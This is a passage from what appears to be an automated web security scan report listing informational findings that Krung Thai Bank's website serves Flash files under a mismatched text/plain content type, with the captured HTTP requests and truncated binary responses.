CWS    L...x...uP...6...;.,.X\....X .kp./.    .\......!.;..-h..4.|.ig.v......?.3...y.9..;sg.s...@....G...$..B.?.E~yy..`...........J....f....S|....;>..~v_....^0B2....'.1K/[..%yEy......^V...4.T.4..L4l.,44.
...[SNIP]...

33.40. http://www.ktb.co.th/flash/b3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/b3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/b3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:23 GMT
Content-length: 43456
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:23 GMT
Etag: "a9c0-4c723a0f"
Accept-ranges: bytes

CWS    `r..x....XS..6...`#R...Fi.FD 4K.B...    ....@h.9...D:RF.....H.2.&#-B ."...!....(.o............]g.....^k.u.....a...@;o^..8?.dw..`.P.......xy.....z...H......c'.............".....W...........}....ck.t.
...[SNIP]...

33.41. http://www.ktb.co.th/flash/c1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/c1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/c1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:35 GMT
Content-length: 24402
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:23 GMT
Etag: "5f52-4c723a0f"
Accept-ranges: bytes

CWS    fv..x...wT.].?.DDA@)"...7..+
..^B..t!...Q...t)!......P.@Bo........g.._.g..w..9'....gf....~.....K.`.'.........^....L:.....$.p..r.pG[CK.@F./..q9    x
.q......o...Mu......6......W.[............T.T.i..
...[SNIP]...

33.42. http://www.ktb.co.th/flash/c2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/c2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/c2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:36 GMT
Content-length: 41628
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:23 GMT
Etag: "a29c-4c723a0f"
Accept-ranges: bytes

CWS    ....x..yeT\..f.A..[.@...!...4....qM xp...X...ww..[.n.;..3k~..{.Zg..U.j...T.~........{..j..'<..H!>??...}I".<.(......../.....!.v.#..G..n.y......... ..s.......\..y....?._.."@
..
.....(...((./.:&..6
...[SNIP]...

33.43. http://www.ktb.co.th/flash/c3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/c3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/c3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:36 GMT
Content-length: 62176
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:24 GMT
Etag: "f2e0-4c723a10"
Accept-ranges: bytes

CWS    K...x.|.u@S...|.........c.t.#F.ll4.H#]...........""..HK...(b.;..x..?.yv.<...9...6...s..w.....a.h.....].......-.[..ut.....i......._.
..Ci7.....3...N..s?m..o    ....K...
9...'DGO....g`.10.32....L..@
...[SNIP]...

33.44. http://www.ktb.co.th/flash/d1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/d1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/d1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:16 GMT
Content-length: 28493
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:28 GMT
Etag: "6f4d-4c723a14"
Accept-ranges: bytes

CWS    >...x...gTSk...u[..]@p+.B..H.-
.D... .-..{/{+..o .)!B.!..!.......K..J....9.x.1._...{..g.k.....\s.{.q_..s.....;....@....;.'._<..k.V....?0.......m.6X.p....?o.c...+.\.v.._X..]g.r......[.7._g..b.~....
...[SNIP]...

33.45. http://www.ktb.co.th/flash/d2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/d2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/d2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:16 GMT
Content-length: 73420
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:28 GMT
Etag: "11ecc-4c723a14"
Accept-ranges: bytes

CWS    .)..x...eT\].%Z..%8..T.......
..`!.K .....P.C..4H..
'.. A;...v...w.~.z.5..Qs.Sg.qv...Y..@...{.`..@..xK..kr.OOOR........X....@...V.........m.{.t........}....
p..{...:......@A...?...9.&:.6&::.&.>.
...[SNIP]...

33.46. http://www.ktb.co.th/flash/d3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/d3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/d3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:17 GMT
Content-length: 141734
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:28 GMT
Etag: "229a6-4c723a14"
Accept-ranges: bytes

CWS    g...x...wTS..-.. .:.Pz    %.D `P.    5..,.J.^.D..*.B.-`....Ti
.E@.7.U..r.....q.q...qW....g.<e.5..{$.@.{........z\..........d'....]..
.4.............'..^..g(...v.....`.q.q.p..y.......m..z........#.
...[SNIP]...

33.47. http://www.ktb.co.th/flash/e1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/e1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/e1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:31 GMT
Content-length: 30946
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:49 GMT
Etag: "78e2-4c723a29"
Accept-ranges: bytes

CWS    ....x...wPSk.7.{. ]..V..J.<..I$.@B..HoR"...
.T... ..B(R..)U.E .....z........<3.{.g..f....k.}...~W.Y.o...........O.......o\.t........g..&..@z@=..s...};..<.\.x......].q.....~K.o.r...y..t...[7......
...[SNIP]...

33.48. http://www.ktb.co.th/flash/e2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/e2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/e2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:31 GMT
Content-length: 28590
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:49 GMT
Etag: "6fae-4c723a29"
Accept-ranges: bytes

CWS    .w..x...wPSk.7....i..Qz...#
H A....
B....GE.~....@..Ej....]J...5..I........3..o.}....){...z.Z..........V~../.......E...uM..y....r.o..../..G.....wn.......,..i%..0..x.........(.7..PW_.p...??1&.O.W
...[SNIP]...

33.49. http://www.ktb.co.th/flash/e3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/e3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/e3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:32 GMT
Content-length: 176514
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:49 GMT
Etag: "2b182-4c723a29"
Accept-ranges: bytes

CWS    .j..x.|.y4...?...X2v.0.]J5..3d-.]d..."c.,3d...Na..lY#Q..Lf...a,!....|........=.y..9.y.=.s_.>...........Z/ ...q....pzz...~.......s.....!.b...8....a=|#....M@....8P.......#..i.!................a.?
...[SNIP]...

33.50. http://www.ktb.co.th/flash/f1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/f1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/f1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:26 GMT
Content-length: 17458
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:51 GMT
Etag: "4432-4c723a2b"
Accept-ranges: bytes

CWS    YV..x...uT\....3..wK.. @......w........    ...Np..!X.08.........s.[w.{.]....Z{O......._Uo.....    ..........<."........g....1...d.e..r..yCL.'..................E.....la.....00P...b.`...S#.$.p    H.O.....
...[SNIP]...

33.51. http://www.ktb.co.th/flash/f2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/f2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/f2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:27 GMT
Content-length: 75331
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:51 GMT
Etag: "12643-4c723a2b"
Accept-ranges: bytes

CWS    N,..x...uP.Q.-xqww.....vo.]48.....48$.].....5.K....7.....z..............Yg.....:......J.......a..........<..H........Y......../..........l.;.)....@......m.6X.$.........k.i."<.2"<<
".:*"".?.......
...[SNIP]...

33.52. http://www.ktb.co.th/flash/f3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/f3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/f3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:27 GMT
Content-length: 43976
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:06:52 GMT
Etag: "abc8-4c723a2c"
Accept-ranges: bytes

CWS    .v..x....XS[.6.T,.H.F.(....H.    ..@B'.H..."Hq....#UB....#E.H...X@..""..../.....sO....s.s.=BV..+.\s.w...Y<...... ....y&..........pf.-..    t.....]....1........W..,..3.8...    ....q....t...t.    ..t........
...[SNIP]...

33.53. http://www.ktb.co.th/flash/home_show_flash1.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/home_show_flash1.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/home_show_flash1.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:01 GMT
Content-length: 53387
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:07:10 GMT
Etag: "d08b-4c723a3e"
Accept-ranges: bytes

CWS    ....x..zeP.A.....C...4......    ....,8..    .....,.........puWu.....UMw..TO?=..tOM......8.........A....Pd...8@J(.....    ............y[.....!. .{......        .................NJI    .CG.......O......_-%....%p....
...[SNIP]...

33.54. http://www.ktb.co.th/flash/home_show_flash2.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/home_show_flash2.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/home_show_flash2.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:07 GMT
Content-length: 671163
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:07:10 GMT
Etag: "a3dbb-4c723a3e"
Accept-ranges: bytes

CWS    ....x.t.{<...?^..]*w.TNu.K..$.as.J.B..9.(....l..%9U.r.H...3.U.#..3.......f'.u...........\.......yz..f...k..|\..v..mk...S(........5Qk6(.].....k.w...v..n}#...j.N.7....zc...5...g)E.............y..
...[SNIP]...

33.55. http://www.ktb.co.th/flash/home_show_flash3.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/home_show_flash3.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/home_show_flash3.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/flash_eng/ktbslide_index.swf
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:45:01 GMT
Content-length: 44200
Content-type: text/plain
Last-modified: Mon, 23 Aug 2010 09:07:10 GMT
Etag: "aca8-4c723a3e"
Accept-ranges: bytes

CWS    .i..x..|{<T....al...    ....I.:1..vF...3....E..h....R.-.&.`..\.-...1.*....".\.........9....._.<............y...
@.y..T..........nll\........r.- ca~...@.....6>.p.0.....(..C.._.V.SA^>....
dc...........
...[SNIP]...

33.56. http://www.ktb.co.th/flash/ktb_group_eng.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash/ktb_group_eng.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash/ktb_group_eng.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/ktb_group/main.jsp
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094; visit_time=440

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:52:17 GMT
Content-length: 190580
Content-type: text/plain
Last-modified: Mon, 14 Mar 2011 02:36:46 GMT
Etag: "2e874-4d7d7f3e"
Accept-ranges: bytes

CWS    ....x..|y8.....1c...5..../c_..B.Y./.B.$d'Y...%..*..-...(.R.........o....z.W......s.~.s.3..Hg...`G(Z..@Z.?..S.!..q.. ..3...................-X34.-......uC...v...P.ap....vqw.'=].=.a.>G    Z.......
...[SNIP]...

33.57. http://www.ktb.co.th/flash_eng/ktbslide_index.swf  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.ktb.co.th
Path:   /flash_eng/ktbslide_index.swf

Issue detail

The response contains the following Content-type statement:The response states that it contains plain text. However, it actually appears to contain a flash object.

Request

GET /flash_eng/ktbslide_index.swf HTTP/1.1
Host: www.ktb.co.th
Proxy-Connection: keep-alive
Referer: http://www.ktb.co.th/en/main/
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=6029AA1259F59A457FB2F7A2587C8B4E; _cbclose=1; _cbclose6897=1; _uid6897=F468DC21.1; _ctout6897=1; __utmz=54991601.1304441094.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Krung%20Thai%20Bank; __utma=54991601.999704112.1304441094.1304441094.1304441094.1; __utmc=54991601; __utmb=54991601.1.10.1304441094

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 11:44:58 GMT
Content-length: 9087
Content-type: text/plain
Last-modified: Fri, 11 Mar 2011 10:18:14 GMT
Etag: "237f-4d79f6e6"
Accept-ranges: bytes

CWS    .U..x..\.\T..?[.J/
.K..... .."..j.Q.........(>c.......E#Xb...X.h...j.I4Q.I..Kb....{...ly......=.....9g..=s...s...5...Th+.A^...........`..*p...`1.6;(......+e+.b.1..A..,z.ep......&T.....s..).l48J@G
...[SNIP]...

33.58. http://www.nbcuniversalstore.com/nbcuniversalstore/layout/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Firm
